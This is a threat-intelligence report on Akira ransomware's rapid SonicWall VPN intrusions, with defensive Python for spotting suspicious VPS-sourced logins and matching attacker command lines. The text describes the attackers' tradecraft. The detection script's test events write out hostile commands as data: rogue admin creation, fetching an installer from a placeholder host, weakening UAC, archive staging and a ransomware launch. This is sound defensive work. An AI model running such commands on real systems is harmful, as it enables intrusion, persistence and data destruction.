2025-10-09

Akira’s SonicWall Blitz: CVE-2024-40766 to Ransomware in Under 4 Hours

Level: Tactical | Source: Arctic Wolf | Global


A surge of intrusions attributed to the Akira ransomware gang in late July 2025 leveraged SonicWall SSL VPN access tied to CVE-2024-40766, with Arctic Wolf assessing both the speed and intent of the activity as data theft followed rapidly by encryption. Arctic Wolf’s detailed reporting notes, “From this perspective, credentials would have potentially been harvested from devices vulnerable to CVE-2024-40766 and later used by threat actors—even if those same devices were patched. Threat actors in the present campaign successfully authenticated against accounts with the one-time password (OTP) MFA feature enabled.” The campaign began on July 21, 2025, and Arctic Wolf observed that once the actors authenticated, escalation from foothold to impact occurred in a very short window. As the firm puts it, “As before, staging time in the current campaign is typically measured in minutes rather than days or weeks, with malicious logins quickly followed by data exfiltration and Akira ransomware deployment if not promptly contained.” Their guidance is blunt: “The most crucial mitigation to this threat is to reset all SSL VPN credentials on SonicWall devices that have ever run firmware vulnerable to CVE-2024-40766, as well as Active Directory credentials on accounts used for SSL VPN access and LDAP synchronization.” Arctic Wolf further warns, “In almost all intrusions, ransomware encryption took place in under four hours from initial access, with a staging interval as short as 55 minutes in some instances.”

Initial access consistently presented as SSL VPN logins sourced from Virtual Private Server (VPS) hosting infrastructure rather than consumer broadband, SD-WAN, or SASE networks. As Arctic Wolf notes, while “legitimate logins typically originate from broadband, SD-WAN, or SASE service providers, logins from VPS infrastructure are far less likely to be benign.” In multiple environments, the login cadence and reuse of the same client IP suggested scripted or semi-automated authentication against compromised accounts. Post-authentication activity began within minutes: reconnaissance with external scanners (Advanced IP Scanner and SoftPerfect Network Scanner) and port sweeps of “135,” “137,” “445,” and “1433” mapped the paths for lateral movement. Telemetry and SMB session setup fingerprints indicated hostnames consistent with “kali,” and Arctic Wolf identified Impacket usage with artifacts supporting the use of “WMIExec” for remote command execution and session discovery. “RDP” was the preferred lateral movement channel, reinforced by domain enumeration via PowerShell (“Get-ADUser,” “Get-ADComputer”) and native tools (e.g., “nltest,” “dsquery”) to map accounts, systems, and shares.
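As an added example (not code from Arctic Wolf's or Anvilogic's reporting), the following Python triage logic flags the login pattern described above: successful SSL VPN authentications from VPS hosting ranges where one client IP authenticates several accounts in a short burst. The login records, address ranges and provider labels are all constructed for the example.

```python
"""Triage SSL VPN logins for the pattern described above: successful
authentications sourced from VPS hosting ranges, with several accounts
logged in from one client IP in a short burst (scripted cadence).
All records, ranges and provider labels are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Stand-in for an ASN / hosting-provider feed (RFC 5737 documentation prefixes).
SOURCE_TYPES = {
    ip_network("203.0.113.0/24"): "vps",         # hypothetical "ExampleVPS Hosting"
    ip_network("198.51.100.0/24"): "broadband",  # hypothetical "ExampleCable ISP"
}

# Constructed login records: (ISO timestamp, user, client IP, OTP passed)
LOGINS = [
    ("2025-07-21T02:14:05", "jsmith",    "198.51.100.7",  True),
    ("2025-07-21T03:40:11", "svc_ldap",  "203.0.113.45",  True),
    ("2025-07-21T03:40:58", "jdoe",      "203.0.113.45",  True),
    ("2025-07-21T03:41:37", "backupadm", "203.0.113.45",  True),
    ("2025-07-21T09:02:44", "mlee",      "198.51.100.22", True),
]

def classify_source(ip: str) -> str:
    """Return 'vps', 'broadband' or 'unknown' for a client IP."""
    addr = ip_address(ip)
    for net, kind in SOURCE_TYPES.items():
        if addr in net:
            return kind
    return "unknown"

def flag_logins(logins, burst_window=timedelta(minutes=10), min_accounts=2):
    """Return {client_ip: [users]} for VPS-sourced IPs that authenticated at
    least min_accounts distinct accounts within burst_window. A passed OTP does
    not clear the alert: the campaign authenticated against OTP-enabled accounts."""
    by_ip = defaultdict(list)
    for ts, user, ip, _otp in logins:
        by_ip[ip].append((datetime.fromisoformat(ts), user))
    flagged = {}
    for ip, events in by_ip.items():
        if classify_source(ip) != "vps":
            continue
        events.sort()
        for i, (t0, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - t0 <= burst_window}
            if len(users) >= min_accounts:
                flagged[ip] = sorted(users)
                break
    return flagged
```

The burst window and account threshold are tuning knobs; a single VPS-sourced login to one account still deserves review even though this logic alone does not flag it.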

Credential access and privilege operations targeted virtualization and backup planes to unlock a wider blast radius. Actors queried Veeam databases using “sqlcmd” and executed a custom PowerShell script to extract and, when needed, decrypt stored credentials (supporting both MSSQL and PostgreSQL backends), enabling access to virtual machine storage and potential domain artifacts. Persistence tactics combined low-friction account creation—“net.exe” provisioning of local or domain admins with service-looking names such as “sqlbackup” or “veean”—with remote monitoring and management tool placements. “AnyDesk,” “TeamViewer,” and “RustDesk” were fetched via PowerShell’s “Invoke-WebRequest” or “Start-BitsTransfer,” silently installed with “msiexec,” and, in RustDesk cases, registered as a service using “sc create” with an imported config. Arctic Wolf also observed SSH-based reverse tunnels and Cloudflare Tunnel (“cloudflared”) services installed under “C:\ProgramData\ssh,” paired with a host firewall rule created via “New-NetFirewallRule” to expose “sshd,” establishing durable command-and-control pathways across NAT boundaries.

Defense evasion and impact actions were systematic and mapped to Windows internals. Volume Shadow Copies were removed using PowerShell to degrade restoration options, and User Account Control (UAC) was weakened by setting the “LocalAccountTokenFilterPolicy” registry value to enable remote full-token use for local admins. Endpoint protections were impeded with a bring-your-own-vulnerable-driver approach: a repackaged “consent.exe” was used to side-load malicious DLLs that loaded kernel-mode drivers (e.g., “rwdrv.sys,” “hlpdrv.sys”) and manipulated ACLs to neutralize security processes without overt termination. Staging for exfiltration relied on “WinRAR,” with switches to split archives (“-v3g”) and filter recent, business-relevant file types, followed by transfer to VPS endpoints via the “FileZilla” SFTP client, rclone, or SSH. The final phase executed Akira payloads using drive-scoped commands like “akira.exe -n=1 -p=D:\” or equivalents and share lists (“-s=share.txt”), completing a smash-and-grab cycle that, per Arctic Wolf’s assessment, routinely compressed the entire kill chain into hours.
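The persistence, tunneling, defense-evasion and impact indicators in the two paragraphs above lend themselves to command-line detection. The following Python is an added example, not code from Arctic Wolf or Anvilogic: it matches constructed process-creation events against patterns built only from the command fragments the report quotes, and the hostnames, paths and URL are placeholders.

```python
"""Match process-creation command lines (Sysmon EID 1 / 4688 style) against
the persistence, C2, defense-evasion and impact indicators quoted above.
Events are constructed for this example; patterns use only the quoted fragments."""
import re

# (rule name, tactic, regex over the command line)
RULES = [
    ("service_named_admin_account", "persistence",
     r"\bnet1?(\.exe)?\s+(user|localgroup)\s+.*\b(sqlbackup|veean)\b.*\s/add\b"),
    ("rmm_fetched_via_powershell", "persistence",
     r"\b(Invoke-WebRequest|Start-BitsTransfer)\b.*\b(anydesk|teamviewer|rustdesk)\b"),
    ("rustdesk_service_created", "persistence", r"\bsc(\.exe)?\s+create\b.*rustdesk"),
    ("tunnel_binary_in_programdata_ssh", "command_and_control",
     r"C:\\ProgramData\\ssh\\.*\b(cloudflared|sshd)\b"),
    ("firewall_rule_exposes_sshd", "command_and_control", r"\bNew-NetFirewallRule\b.*\bsshd\b"),
    ("uac_remote_token_filter_disabled", "defense_evasion", r"LocalAccountTokenFilterPolicy\b.*\b1\b"),
    ("byovd_driver_file", "defense_evasion", r"\b(rwdrv|hlpdrv)\.sys\b"),
    ("winrar_split_archive_staging", "collection", r"\b(winrar|rar)(\.exe)?\b.*\s-v3g\b"),
    ("akira_drive_scoped_run", "impact", r"\s-n=\d+\s.*-(p=[A-Za-z]:\\|s=\S+\.txt)"),
]
COMPILED = [(name, tactic, re.compile(rx, re.I)) for name, tactic, rx in RULES]

# Constructed events: (host, command line). Hosts, paths and the URL are placeholders.
EVENTS = [
    ("ws01", r"net user veean P@ss /add"),
    ("srv02", r"powershell Invoke-WebRequest https://example.invalid/rustdesk.msi -OutFile C:\Temp\r.msi"),
    ("srv02", r'sc create rustdesk binPath= "C:\Program Files\RustDesk\rustdesk.exe --service"'),
    ("srv02", r"powershell New-NetFirewallRule -DisplayName ssh -Program C:\ProgramData\ssh\sshd.exe -Action Allow"),
    ("dc01", r"reg add HKLM\<policies key> /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"),
    ("fs01", r"rar.exe a -v3g D:\out\docs.rar D:\Finance"),
    ("fs01", r"C:\Temp\w.exe -n=1 -p=D:\ -s=share.txt"),  # renamed payload: match on the argument shape
    ("ws05", r"powershell Get-ADUser -Filter *"),          # enumeration only; no rule above covers it
]

def match_events(events):
    """Return [(host, rule name, tactic)] for every event/rule pair that hits."""
    return [(host, name, tactic)
            for host, cmd in events
            for name, tactic, rx in COMPILED if rx.search(cmd)]

def hosts_by_tactic(events):
    """Group hit hosts by tactic so a responder sees how far each host progressed."""
    out = {}
    for host, _name, tactic in match_events(events):
        out.setdefault(tactic, set()).add(host)
    return out
```

Because the campaign moves from login to encryption in hours, any "impact" or "collection" hit should page immediately rather than wait for batch review.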
